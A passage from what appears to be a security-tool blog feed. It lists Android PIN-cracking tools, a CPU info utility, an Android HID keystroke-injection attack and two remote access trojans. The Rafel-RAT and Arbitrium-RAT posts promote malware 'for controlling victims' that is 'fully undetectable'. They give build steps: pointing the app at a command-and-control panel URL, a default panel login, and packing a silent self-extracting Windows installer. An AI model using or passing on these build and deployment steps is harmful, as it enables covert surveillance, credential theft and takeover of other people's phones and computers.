usb-devices script <a href="https://github.com/gregkh/usbutils/blob/master/usb-devices" rel="nofollow" target="_blank" title="https://github.com/gregkh/usbutils/blob/master/usb-devices">https://github.com/gregkh/usbutils/blob/master/usb-devices</a></p> <br /><b>Cracking Android PIN and Pattern files</b><br /> <p>AndroidPINCrack - bruteforce the Android Passcode given the hash and salt (requires root on the phone) <a href="https://github.com/PentesterES/AndroidPINCrack" rel="nofollow" target="_blank" title="https://github.com/PentesterES/AndroidPINCrack">https://github.com/PentesterES/AndroidPINCrack</a></p> <p>Android Pattern Lock Cracker - bruteforce the Android Pattern given an SHA1 hash (requires root on the phone) <a href="https://github.com/sch3m4/androidpatternlock" rel="nofollow" target="_blank" title="https://github.com/sch3m4/androidpatternlock">https://github.com/sch3m4/androidpatternlock</a></p> <br /><b>General Recovery Methods</b><br /> <p>[Android][Guide]Hacking And Bypassing Android Password/Pattern/Face/PI <a href="https://forum.xda-developers.com/showthread.php?t=2620456" rel="nofollow" target="_blank" title="https://forum.xda-developers.com/showthread.php?t=2620456">https://forum.xda-developers.com/showthread.php?t=2620456</a></p> <p>Android BruteForce using ADB & Shell Scripting <a href="https://github.com/Gh005t/Android-BruteForce" rel="nofollow" target="_blank" title="https://github.com/Gh005t/Android-BruteForce">https://github.com/Gh005t/Android-BruteForce</a></p> <br /><b>Forensic Methods and Hardware</b><br /> <p>PATCtech Digital Forensics: Getting Past the Android Passcode <a href="http://patc.com/online/a/Portals/965/Android%20Passcode.pdf" rel="nofollow" target="_blank" title="http://patc.com/online/a/Portals/965/Android%20Passcode.pdf">http://patc.com/online/a/Portals/965/Android%20Passcode.pdf</a></p> <p>XPIN Clip <a href="https://xpinclip.com/" rel="nofollow" target="_blank" title="https://xpinclip.com/">https://xpinclip.com/</a></p> 
<p>HDBox from HDB Team <a href="https://hdb-team.com/product/hdbox/" rel="nofollow" target="_blank" title="https://hdb-team.com/product/hdbox/">https://hdb-team.com/product/hdbox/</a></p> <p>Cellebrite UFED <a href="https://www.cellebrite.com/en/ufed/" rel="nofollow" target="_blank" title="https://www.cellebrite.com/en/ufed/">https://www.cellebrite.com/en/ufed/</a></p> <p>GrayKey from Grayshift <a href="https://www.grayshift.com/graykey/" rel="nofollow" target="_blank" title="https://www.grayshift.com/graykey/">https://www.grayshift.com/graykey/</a></p> <br /><b>PIN Analysis</b><br /> <p>Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO) <a href="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler" rel="nofollow" target="_blank" title="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler">https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler</a></p> <p>DataGenetics PIN analysis <a href="https://datagenetics.com/blog/september32012/index.html" rel="nofollow" target="_blank" title="https://datagenetics.com/blog/september32012/index.html">https://datagenetics.com/blog/september32012/index.html</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/urbanadventurer/Android-PIN-Bruteforce" rel="nofollow" target="_blank" title="Download Android-PIN-Bruteforce">Download Android-PIN-Bruteforce</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-90971200952837208472021-04-11T17:30:00.027-04:002021-04-11T17:30:00.710-04:00Cpufetch - Simplistic Yet Fancy CPU Architecture Fetching Tool<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gW4iYIx5CtU/YGvhCi0WHtI/AAAAAAAAV0w/BVU7TtULfJ4WX32_09My7WRrmnWotrnfgCNcBGAsYHQ/s1119/cpufetch_7_i9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" 
data-original-height="393" data-original-width="1119" height="224" src="https://1.bp.blogspot.com/-gW4iYIx5CtU/YGvhCi0WHtI/AAAAAAAAV0w/BVU7TtULfJ4WX32_09My7WRrmnWotrnfgCNcBGAsYHQ/w640-h224/cpufetch_7_i9.png" width="640" /></a></div><p><br /></p><p>Simplistic yet fancy CPU architecture fetching tool</p><span><a name='more'></a></span><p><br /></p><span style="font-size: x-large;"><b>1. Support</b></span><br /> <p>cpufetch currently supports x86_64 CPUs (both Intel and AMD) and ARM.</p> <table> <tr> <th align="center">Platform</th> <th align="center">x86_64</th> <th align="center">ARM</th> <th align="center">Notes</th> </tr> <tr> <td align="center">Linux</td> <td align="center"><div>✔️</div></td> <td align="center"><div>✔️</div></td> <td align="center">Preferred platform. <br /> Experimental ARM support</td> </tr> <tr> <td align="center">Windows</td> <td align="center"><div>✔️</div></td> <td align="center"><div>❌</div></td> <td align="center">Some information may be missing. <br /> Colors will be used if supported</td> </tr> <tr> <td align="center">Android</td> <td align="center"><div>❗</div></td> <td align="center"><div>✔️</div></td> <td align="center">Experimental ARM support</td> </tr> <tr> <td align="center">macOS</td> <td align="center"><div>✔️</div></td> <td align="center"><div>❌</div></td> <td align="center">Some information may be missing</td> </tr> </table> <table> <tr> <th align="center">Emoji</th> <th align="center">Meaning</th> </tr> <tr> <td align="center"><div>✔️</div></td> <td align="center">Supported</td> </tr> <tr> <td align="center"><div>❌</div></td> <td align="center">Not supported</td> </tr> <tr> <td align="center"><div>❗</div></td> <td align="center">Not tested</td> </tr> </table> <br /><span style="font-size: x-large;"><b>2. 
Installation</b></span><br /> <br /><span style="font-size: large;"><b>2.1 Building from source</b></span><br /> <p>Just clone the repo and use <code>make</code> to compile it</p> <pre><code>git clone https://github.com/Dr-Noob/cpufetch<br />cd cpufetch<br />make<br />./cpufetch<br /></code></pre> <p>The Makefile is designed to work on Linux, <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> and macOS.</p> <br /><span style="font-size: large;"><b>2.2 Linux</b></span><br /> <p>There is a cpufetch package available in <a href="https://www.kitploit.com/search/label/Arch%20Linux" target="_blank" title="Arch Linux">Arch Linux</a> (<a href="https://aur.archlinux.org/packages/cpufetch-git" rel="nofollow" target="_blank" title="cpufetch-git">cpufetch-git</a>). If you are on another distribution, you can build <code>cpufetch</code> from source.</p> <br /><span style="font-size: large;"><b>2.3 Windows</b></span><br /> <p>In the <a href="https://github.com/Dr-Noob/cpufetch/releases" rel="nofollow" target="_blank" title="releases">releases</a> section you will find some cpufetch executables compiled for Windows. Just download one and run it from Windows CMD. You can also build <code>cpufetch</code> from source.</p> <br /><span style="font-size: large;"><b>2.4 macOS</b></span><br /> <p>You need to build <code>cpufetch</code> from source.</p> <br /><span style="font-size: large;"><b>2.5 Android</b></span><br /> <ol> <li>Install the <code>termux</code> app (terminal emulator)</li> <li>Run <code>pkg install -y git make clang</code> inside termux.</li> <li>Build from source normally:</li> </ol> <ul> <li>git clone <a href="https://github.com/Dr-Noob/cpufetch" rel="nofollow" target="_blank" title="https://github.com/Dr-Noob/cpufetch">https://github.com/Dr-Noob/cpufetch</a></li> <li>cd cpufetch</li> <li>make</li> <li>./cpufetch</li> </ul> <br /><span style="font-size: x-large;"><b>3. 
Examples</b></span><br /> <p>Here are more examples of how <code>cpufetch</code> looks on different CPUs.</p> <br /><span style="font-size: large;"><b>3.1 x86_64 CPUs</b></span><br /> <p><br /></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-fFmkaqMp5qM/YGvhKvuE5_I/AAAAAAAAV04/1cxvYR0awmEHVHpfc1ZRPb6878gF941zwCNcBGAsYHQ/s1033/cpufetch_8_epyc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="396" data-original-width="1033" height="246" src="https://1.bp.blogspot.com/-fFmkaqMp5qM/YGvhKvuE5_I/AAAAAAAAV04/1cxvYR0awmEHVHpfc1ZRPb6878gF941zwCNcBGAsYHQ/w640-h246/cpufetch_8_epyc.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-BoCNiF_Mqg8/YGvhKiEovqI/AAAAAAAAV00/RlkLaqx5wAoGfy2RTAfdhbg4EO_qiqL4wCNcBGAsYHQ/s1107/cpufetch_9_cascade_lake.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="398" data-original-width="1107" height="230" src="https://1.bp.blogspot.com/-BoCNiF_Mqg8/YGvhKiEovqI/AAAAAAAAV00/RlkLaqx5wAoGfy2RTAfdhbg4EO_qiqL4wCNcBGAsYHQ/w640-h230/cpufetch_9_cascade_lake.png" width="640" /></a></div><br /><p></p><span style="font-size: large;"><b>3.2 ARM CPUs</b></span><br /> <p> </p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-liHK00gR8qM/YGvhQARp_UI/AAAAAAAAV1A/ouY0-MaMm7ICBCsrfvpCeS0F2BGlAcK1gCNcBGAsYHQ/s1173/cpufetch_11_snapdragon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="398" data-original-width="1173" height="218" src="https://1.bp.blogspot.com/-liHK00gR8qM/YGvhQARp_UI/AAAAAAAAV1A/ouY0-MaMm7ICBCsrfvpCeS0F2BGlAcK1gCNcBGAsYHQ/w640-h218/cpufetch_11_snapdragon.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-a3y22tYqlAk/YGvhQOcvTZI/AAAAAAAAV08/J5y8fKfYp9spQALMfEb0HKIwbtl2BpxQQCNcBGAsYHQ/s1173/cpufetch_10_exynos.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="398" data-original-width="1173" height="218" src="https://1.bp.blogspot.com/-a3y22tYqlAk/YGvhQOcvTZI/AAAAAAAAV08/J5y8fKfYp9spQALMfEb0HKIwbtl2BpxQQCNcBGAsYHQ/w640-h218/cpufetch_10_exynos.png" width="640" /></a></div><p><br /></p><span style="font-size: x-large;"><b>4. Colors and style</b></span><br /> <p>By default, <code>cpufetch</code> will print the CPU art with the system colorscheme. However, you can always set a custom color scheme, either by specifying Intel or AMD, or by specifying the colors in RGB format:</p> <pre><code>./cpufetch --color intel (default color for Intel)<br />./cpufetch --color amd (default color for AMD)<br />./cpufetch --color 239,90,45:210,200,200:100,200,45:0,200,200 (example)<br /></code></pre> <p>When setting the colors using RGB, 4 colors must be given, in the format <code>[R,G,B:R,G,B:R,G,B:R,G,B]</code>. The first two colors are used for the CPU art and the last two for the text, so all the colors can be customised.</p> <br /><span style="font-size: x-large;"><b>5. Implementation</b></span><br /> <p>See <a href="https://github.com/Dr-Noob/cpufetch/blob/master/doc/README.md" rel="nofollow" target="_blank" title="cpufetch programming documentation">cpufetch programming documentation</a>.</p> <br /><span style="font-size: x-large;"><b>6. Bugs or improvements</b></span><br /> <p>There are many open issues in github (see <a href="https://github.com/Dr-Noob/cpufetch/issues" rel="nofollow" target="_blank" title="issues">issues</a>). 
Feel free to open a new one to report an issue or propose any improvement in <code>cpufetch</code>.</p> <p>I would like to thank <a href="https://github.com/Gonzalocl" rel="nofollow" target="_blank" title="Gonzalocl">Gonzalocl</a> and <a href="https://github.com/OdnetninI" rel="nofollow" target="_blank" title="OdnetninI">OdnetninI</a> for their help, running <code>cpufetch</code> on many different CPUs they have <a href="https://www.kitploit.com/search/label/Access" target="_blank" title="access">access</a> to, which makes it easier to debug and check the correctness of <code>cpufetch</code>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Dr-Noob/cpufetch" rel="nofollow" target="_blank" title="Download Cpufetch">Download Cpufetch</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-40391194116257508242021-03-30T08:30:00.001-03:002021-03-30T08:30:11.992-03:00Android_Hid - Use Android As Rubber Ducky Against Another Android Device<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1VxT_z9WSW4/YGDzlYomI7I/AAAAAAAAVuM/t3k8P1JyeKwJUhGWOfW1kf4_TGK5sr8VQCNcBGAsYHQ/s734/Android_Hid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="734" data-original-width="598" height="640" src="https://1.bp.blogspot.com/-1VxT_z9WSW4/YGDzlYomI7I/AAAAAAAAVuM/t3k8P1JyeKwJUhGWOfW1kf4_TGK5sr8VQCNcBGAsYHQ/w522-h640/Android_Hid.png" width="522" /></a></div><p><br /></p> <p>Use Android as a <a href="https://www.kitploit.com/search/label/Rubber%20Ducky" target="_blank" title="Rubber Ducky">Rubber Ducky</a> against another Android device</p> <br /><span style="font-size: large;"><b>HID attack using Android</b></span><br /> <p>Using Android as a Rubber Ducky against Android. 
This is not a new technique, just a demo of how to perform a HID attack using Android instead of a Rubber Ducky. The targeted Android device does not need to be rooted, nor to have ADB/USB <a href="https://www.kitploit.com/search/label/Debugging" target="_blank" title="debugging">debugging</a> enabled and the device authorized, since the attacker's <a href="https://www.kitploit.com/search/label/Smartphone" target="_blank" title="smartphone">smartphone</a> behaves as a connected keyboard.</p><span><a name='more'></a></span><div><br /></div><b>How to prevent this from happening</b><br /> <ol> <li>charge your smartphone using your own adapter</li> <li>use a non-trivial PIN or password for lockscreen protection</li> <li>use mobile security software that will detect and prevent the launching of payloads</li> </ol> <br /><b>PoC</b><br /> <p style="text-align: center;"><iframe width="560" height="315" src="https://www.youtube.com/embed/aOWr6rWhsIs" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p> <br /><b>Prerequisites</b><br /> <ul> <li>rooted Android with HID kernel support (e.g. <a href="https://www.kitploit.com/search/label/NetHunter" target="_blank" title="NetHunter">NetHunter</a> ROM)</li> <li>OTG cable</li> </ul> <br /><b>Script info</b><br /> <p>This is a custom script, which might not work in your test scenario. Because of that, you must play around with the pressed keys that are sent to the targeted device. The website with my testing payload is not active anymore. 
A list of all possible keys can be found at the link below.</p> <br /><b>Execute command</b><br /> <p><code>bash hid_attack</code></p> <br /><b>How to flash a custom ROM with HID support</b><br /> <p><a href="https://github.com/pelya/android-keyboard-gadget" rel="nofollow" target="_blank" title="https://github.com/pelya/android-keyboard-gadget">https://github.com/pelya/android-keyboard-gadget</a></p> <br /><b>Brute-force PIN using Android as HID</b><br /> <p><a href="https://github.com/urbanadventurer/Android-PIN-Bruteforce" rel="nofollow" target="_blank" title="https://github.com/urbanadventurer/Android-PIN-Bruteforce">https://github.com/urbanadventurer/Android-PIN-Bruteforce</a></p> <br /><b>List of all keys</b><br /> <p><a href="https://github.com/anbud/DroidDucky/blob/master/droidducky.sh" rel="nofollow" target="_blank" title="https://github.com/anbud/DroidDucky/blob/master/droidducky.sh">https://github.com/anbud/DroidDucky/blob/master/droidducky.sh</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/androidmalware/android_hid" rel="nofollow" target="_blank" title="Download Android_Hid">Download Android_Hid</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-9581795551177597892021-03-19T08:30:00.001-03:002021-03-19T08:30:06.014-03:00Rafel-Rat - Android Rat Written In Java With WebPanel For Controlling Victims<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-vCWi9edZZ3U/YE5sbCxFGCI/AAAAAAAAVlk/F-k6DntTpWIWxCRQnNCU6gYa23t7uIp2gCNcBGAsYHQ/s288/Rafel-Rat_1.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="288" data-original-width="215" src="https://1.bp.blogspot.com/-vCWi9edZZ3U/YE5sbCxFGCI/AAAAAAAAVlk/F-k6DntTpWIWxCRQnNCU6gYa23t7uIp2gCNcBGAsYHQ/s0/Rafel-Rat_1.gif" /></a></div><br /><p><br /></p><p><br /></p><p align="center"> <b>Rafel</b> is <b>Remote <a 
href="https://www.kitploit.com/search/label/Access" target="_blank" title="Access">Access</a> Tool</b> Used to Control Victims Using <b>WebPanel</b> With More Advanced Features.</p><span><a name='more'></a></span><p align="center"><br /></p><span style="font-size: large;"><b>Main Features</b></span><br /> <ul class="contains-task-list"> <li class="task-list-item">Admin Permission</li> <li class="task-list-item">Add App To White List</li> <li class="task-list-item">Looks Like Browser</li> <li class="task-list-item">Runs In Background Even If App Is Closed (May not work on some Devices)</li> <li class="task-list-item">Accessibility Feature</li> <li class="task-list-item">Supports <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> v5 - v10</li> <li class="task-list-item">No <a href="https://www.kitploit.com/search/label/Port%20Forwarding" target="_blank" title="Port Forwarding">Port Forwarding</a> Needed</li> <li class="task-list-item">Acquire Wakelock</li> <li class="task-list-item">Fully Undetectable</li> </ul> <br /><span style="font-size: large;"><b>Prerequisites</b></span><br /> <ul> <li>Android Studio</li> </ul> <p>OR</p> <ul> <li><a href="https://forum.xda-developers.com/android/software-hacking/tool-apk-easy-tool-v1-02-windows-gui-t3333960" rel="nofollow" target="_blank" title="ApkEasyTool">ApkEasyTool</a></li> </ul> <br /><span style="font-size: large;"><b>Building <a href="https://www.kitploit.com/search/label/Apk" target="_blank" title="Apk">Apk</a> With Android Studio</b></span><br /> <ol> <li>Open Project <em><strong>Lite_Browsercode</strong></em> in Android Studio</li> <li>Put the server's <code>command.php</code> link in the InternalService class</li> <li>Build the Project</li> <li>Zipalign and sign the Apk...</li> </ol> <br /><span style="font-size: large;"><b>Building Apk with ApkEasyTool</b></span><br /> <ol> <li>Navigate to <em><strong>\Lite_Browser\smali\com\velociraptor\raptor</strong></em></li> 
<li>Open InternalService.smali</li> <li>Replace this with your panel URL: <em><strong>const-string v0, "<a href="https://your-webpanel-url/commands.php" rel="nofollow" target="_blank" title="https://your-webpanel-url/commands.php">https://your-webpanel-url/commands.php</a>"</strong></em></li> </ol> <br /><span style="font-size: large;"><b>Building Server</b></span><br /> <ol> <li>Upload the files in the server folder to your hosting panel</li> <li>Now open login.php</li> <li>Enter username <em><strong>Hande</strong></em>, password <em><strong>Ercel</strong></em></li> <li>Note: make sure your web hosting site uses HTTPS and has a valid connection... I recommend 000webhost.com</li> <li>You can now use the panel to send commands; refresh after sending</li> </ol> <br /><span style="font-size: x-large;"><b>Screenshots</b></span><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-DrY3G7rFNmM/YE5x8aR8rDI/AAAAAAAAVmU/-EcF1KL4tMYc2kuZvPzdx1k1tNnpYegvQCNcBGAsYHQ/s1738/Rafel-Rat_6_Screenshot%252520%252870%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="733" data-original-width="1738" height="270" src="https://1.bp.blogspot.com/-DrY3G7rFNmM/YE5x8aR8rDI/AAAAAAAAVmU/-EcF1KL4tMYc2kuZvPzdx1k1tNnpYegvQCNcBGAsYHQ/w640-h270/Rafel-Rat_6_Screenshot%252520%252870%2529.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-0dORh5f48d0/YE5x8R_fmHI/AAAAAAAAVmQ/0yRgjUd9musig_4-gNNSeUqd51_--X2fwCNcBGAsYHQ/s1674/Rafel-Rat_7_Screenshot%252520%252871%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="715" data-original-width="1674" height="274" 
src="https://1.bp.blogspot.com/-0dORh5f48d0/YE5x8R_fmHI/AAAAAAAAVmQ/0yRgjUd9musig_4-gNNSeUqd51_--X2fwCNcBGAsYHQ/w640-h274/Rafel-Rat_7_Screenshot%252520%252871%2529.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-XxhFNe7gZ9U/YE5x8fmwVEI/AAAAAAAAVmY/EUYolhddO-YnxoE_eYg7qKg82VcCpt7LACNcBGAsYHQ/s1802/Rafel-Rat_8_Screenshot%252520%252872%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="846" data-original-width="1802" height="300" src="https://1.bp.blogspot.com/-XxhFNe7gZ9U/YE5x8fmwVEI/AAAAAAAAVmY/EUYolhddO-YnxoE_eYg7qKg82VcCpt7LACNcBGAsYHQ/w640-h300/Rafel-Rat_8_Screenshot%252520%252872%2529.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-Ru5WQZp1SoI/YE5x9JMNcBI/AAAAAAAAVmc/B_mZlaBEUds4Ef6rsenWFlEiQxH-q_qewCNcBGAsYHQ/s1718/Rafel-Rat_9_Screenshot%252520%252873%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="721" data-original-width="1718" height="268" src="https://1.bp.blogspot.com/-Ru5WQZp1SoI/YE5x9JMNcBI/AAAAAAAAVmc/B_mZlaBEUds4Ef6rsenWFlEiQxH-q_qewCNcBGAsYHQ/w640-h268/Rafel-Rat_9_Screenshot%252520%252873%2529.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-Bz7NKcjH4l0/YE5wMVCa19I/AAAAAAAAVl0/0UcDMvrKfi8ZZIwguH2wfdoKu6KFcgIggCNcBGAsYHQ/s1400/Rafel-Rat_10_Screenshot%252520%252884%2529.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1400" data-original-width="715" height="640" src="https://1.bp.blogspot.com/-Bz7NKcjH4l0/YE5wMVCa19I/AAAAAAAAVl0/0UcDMvrKfi8ZZIwguH2wfdoKu6KFcgIggCNcBGAsYHQ/w327-h640/Rafel-Rat_10_Screenshot%252520%252884%2529.png" width="327" /></a></div><br /><div 
class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-iqM5VDSUfZY/YE5wMdQBKcI/AAAAAAAAVls/W8MoBQ1-bYg1yudm7cZ4kfAbYgzX1jfwQCNcBGAsYHQ/s1389/Rafel-Rat_11_Screenshot%252520%252885%2529.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1389" data-original-width="714" height="640" src="https://1.bp.blogspot.com/-iqM5VDSUfZY/YE5wMdQBKcI/AAAAAAAAVls/W8MoBQ1-bYg1yudm7cZ4kfAbYgzX1jfwQCNcBGAsYHQ/w328-h640/Rafel-Rat_11_Screenshot%252520%252885%2529.png" width="328" /></a></div><br /><br /><br /><br /><span style="font-size: large;"><b>Check this Article</b></span><br /> <ul> <li><a href="https://dontkillmyapp.com/" rel="nofollow" target="_blank" title="https://dontkillmyapp.com/">https://dontkillmyapp.com/</a></li> </ul> <br /><span style="font-size: large;"><b>Credits :</b></span><br /> <ul> <li><a href="https://github.com/sulanmehmetsirin" rel="nofollow" target="_blank" title="Mehmet Şirin Sulan">Mehmet Şirin Sulan</a></li> <li>Aisha</li> <li><a href="https://github.com/graysuit" rel="nofollow" target="_blank" title="GraySuit">GraySuit</a></li> </ul> <br /><span style="font-size: x-large;"><b>Disclaimer</b></span><br /> <p><b>Swagkarna Provides no warranty and will not be responsible for any direct or indirect damage caused by this tool.<br /> Rafel-Rat is built for Educational and Internal use ONLY.</b></p> <br /><p></p> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/swagkarna/Rafel-Rat" rel="nofollow" target="_blank" title="Download Rafel-Rat">Download Rafel-Rat</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-71945859131478406682021-01-29T08:30:00.046-03:002021-01-29T08:30:06.375-03:00Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linux<div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-lpLlY3iz80U/YA4_6ZOeq7I/AAAAAAAAVH0/kI1Zr0K0ss0KeT4a2a97JE34WiiWwFohQCNcBGAsYHQ/s1280/Arbitrium-RAT_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1280" height="360" src="https://1.bp.blogspot.com/-lpLlY3iz80U/YA4_6ZOeq7I/AAAAAAAAVH0/kI1Zr0K0ss0KeT4a2a97JE34WiiWwFohQCNcBGAsYHQ/w640-h360/Arbitrium-RAT_1.png" width="640" /></a></div><p><br /></p> <p>Arbitrium is a cross-platform <a href="https://www.kitploit.com/search/label/Remote%20Access" target="_blank" title="remote access">remote access</a> trojan (RAT), Fully UnDetectable (FUD). It allows you to control Android, Windows and Linux and doesn't require any firewall exceptions or port forwarding. It gives access to the local networks: you can use the targets as an HTTP proxy to access the router, discover local IPs and scan their ports. It includes modules like Mimikatz, and new modules can easily be added. In addition, if Arbitrium is used with DNS spoofing software it can spread autonomously between devices (#AutoSpread). 
Arbitrium is a project with multiple parts, built using Java, JS, C, Python, Cordova and VueJS.<span></span></p><a name='more'></a><p></p> <p><br /></p><p style="text-align: center;"><iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/7KlPPND2b0g" width="560"></iframe></p><p><br /></p><span style="font-size: x-large;"><b>Features:</b></span><br /> <ul class="contains-task-list"> <li class="task-list-item"><strong>FUD</strong></li> </ul> <p>The client uses simple tools, which makes it completely undetectable; the trojan is based on netcat and mainly pipes TCP packets to run the server's commands.</p> <ul class="contains-task-list"> <li class="task-list-item"><strong>Firewall</strong></li> </ul> <p>Arbitrium doesn't require adding an exception to the firewall, or a <a href="https://www.kitploit.com/search/label/Port%20Forwarding" target="_blank" title="port forwarding">port forwarding</a> rule. The server is an API with endpoints that receive tasks for a specific target, and others that the trojan periodically requests to get new instructions; the instructions can be a JavaScript file (the Android app is made using Cordova) or a shell file to run in the terminal/CMD. Once the server receives a task for a device, it schedules the task and then opens a child process that waits for the trojan's response by listening on a dedicated ephemeral port. Therefore, the trojan doesn't need to listen on any port.</p> <ul class="contains-task-list"> <li class="task-list-item"><strong>Battery optimization / StealthMode</strong></li> </ul> <p>Unlike stock Android, customizations like MIUI by Xiaomi, EMUI by Huawei or Samsung's Android Pie ignore the permissions/exceptions given to an app by the user. 
So if you try to run an Android trojan in the background, the moment the app starts running frequent or heavy (in some cases even lightweight) tasks (e.g. sending HTTP requests periodically) it will be killed no matter what permissions the user grants; the OS completely ignores the current settings. dontkillmyapp.com is a well-known website dedicated to this particular issue.</p> <p>The aforementioned issue was quite annoying while working on this project; after a while I found that building a lightweight binary that keeps running the assigned tasks in the background, while the MainActivity stands still just after launching the binary, appears to bypass most of the <a href="https://www.kitploit.com/search/label/Restrictions" target="_blank" title="restrictions">restrictions</a> and actually even improves the performance of the app.</p> <p>MainActivity receives a JS file from the server and uses <code>ThreadPoolExecutor</code> to launch the binary without waiting for it to exit (more on this under <a href="https://github.com/BenChaliah/Arbitrium-RAT#stealthmode" rel="nofollow" target="_blank" title="StealthMode/BatteryBypass">StealthMode/BatteryBypass</a>).</p> <ul class="contains-task-list"> <li class="task-list-item"><strong>Web interface</strong></li> </ul> <p>There is also a control panel; it's not a requirement but an extension. It's a simple VueJS webapp, a UI you can use to control the targets instead of directly sending requests to the API. 
The webapp is available here: <a href="https://github.com/BenChaliah/Arbitrium-WebApp" rel="nofollow" target="_blank" title="Arbitrium WebApp">Arbitrium WebApp</a></p> <br /><span style="font-size: x-large;"><b>Requirements</b></span><br /> <ol> <li>Android client</li> </ol> <pre><code>Java ver ...<br />Cordova<br />Android SDK & NDK<br /></code></pre> <ol start="2"> <li>Windows/Linux client</li> </ol> <pre><code>Python3.6 (or newer)<br />PyInquirer<br />Winrar (Windows only)<br /></code></pre> <br /><span style="font-size: x-large;"><b><strong>Build</strong></b></span><br /> <blockquote> <p></p><div>Use <code>setAPI_FQDN.sh</code> first to set the server domain/IP in all files.</div></blockquote> <p>Clone repo:</p> <p><code>git clone https://github.com/BenChaliah/Arbitrium-RAT.git --recursive</code></p> <ol> <li>Android</li> </ol> <div><pre><code>$ cd ArbitriumClients/AndroidApp/ClientApp/<br />$ cordova build android<br />$ cd ../StealthMode/<br />$ make clean && make build</code></pre></div> <blockquote> <p>The binaries inside <code>/libs</code> are stripped, so it is recommended to use these if you're not debugging.</p> </blockquote> <ol start="2"> <li>Windows</li> </ol> <div><pre><code>$ cd ArbitriumClients\WindowsApp<br />$ pyinstaller --onefile runFrame.py<br />$ copy Client_tools\toolbox.exe dist\<br />$ copy Client_tools\SFXAutoInstaller.conf dist\<br />$ copy Client_tools\start_script.vbs dist\<br />$ cd dist<br />$ {Rar_abspath} a -r -cfg -sfx -z"SFXAutoInstaller.conf" Standalone.exe </code></pre></div> <br /><span style="font-size: x-large;"><b>Components</b></span><br /> <ol> <li><a href="https://github.com/BenChaliah/Arbitrium-RAT/blob/main/ServerAPI" rel="nofollow" target="_blank" title="Server API">Server API</a></li> </ol> <blockquote> <p></p><div>The binaries built for Android should be put inside <code>/assets</code> (rename them to <code>binary_{cpuabi}</code>) and the APK will download them, but if you wish to put them inside the APK just make 
